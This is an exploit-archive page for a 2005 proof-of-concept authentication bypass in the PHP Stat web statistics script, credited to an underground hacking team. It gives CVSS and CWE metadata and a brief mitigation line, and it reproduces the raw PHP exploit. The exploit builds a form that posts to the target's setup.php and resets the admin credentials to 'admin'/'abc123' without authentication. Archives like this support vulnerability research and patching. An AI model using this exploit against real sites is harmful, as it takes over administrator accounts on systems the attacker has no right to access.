PHP Stat Administrative User Authentication Bypass POC Exploit

vendor:

PHP Stat

by:

Trap-Set Underground Hacking Team

7.5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: PHP Stat

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

PHP Stat Administrative User Authentication Bypass POC Exploit

This exploit allows an attacker to bypass the authentication of the PHP Stat administrative user. The attacker can send a crafted HTTP request to the vulnerable server with the username and password set to 'admin' and 'abc123' respectively. This will allow the attacker to gain access to the administrative user account.

Mitigation:

Ensure that authentication is properly implemented and that all user input is properly sanitized.

Source

Exploit-DB raw data:

<?php
error_reporting(E_PARSE);
/*
================================================================
PHP Stat Administrative User Authentication Bypass POC Exploit
================================================================
====Trap-Set Underground Hacking Team===========mh_p0rtal============

Greetz to : Alpha_programmer , Oil_karchack , Str0ke   And Iranian Hacking & Security Teams :
Alphast , IHS Team , Shabgard Security Team , Emperor Hacking TEam
, CrouZ Security Team , Simorgh-ev Security Team ,

====================^^^^^^^^^^^^^^^^^^^-=========================
*/
# Config ________________________________
# address - example: http://www.site.com/setup.php Or www.site.com /dir/setup.php

$url = "http://www.site.com/setup.php";

# EnD ___________________________________

print "<form action=\"$url?check=yes&username=$username&password=$password\" >";
print "<input type=\"hidden\" name=\"check\"  value=\"yes\">";
print "Username : <input type=\"text\" name=\"username\"  value=\"admin\" size=\"25\"><br>";
print "Password : <input type=\"text\" name=\"password\"  value=\"abc123\" size=\"25\"><br>";
print ("<input type=submit value=::Change. > \n");
print "</form>";

//------------------------------------------------------End.
?>

# milw0rm.com [2005-05-30]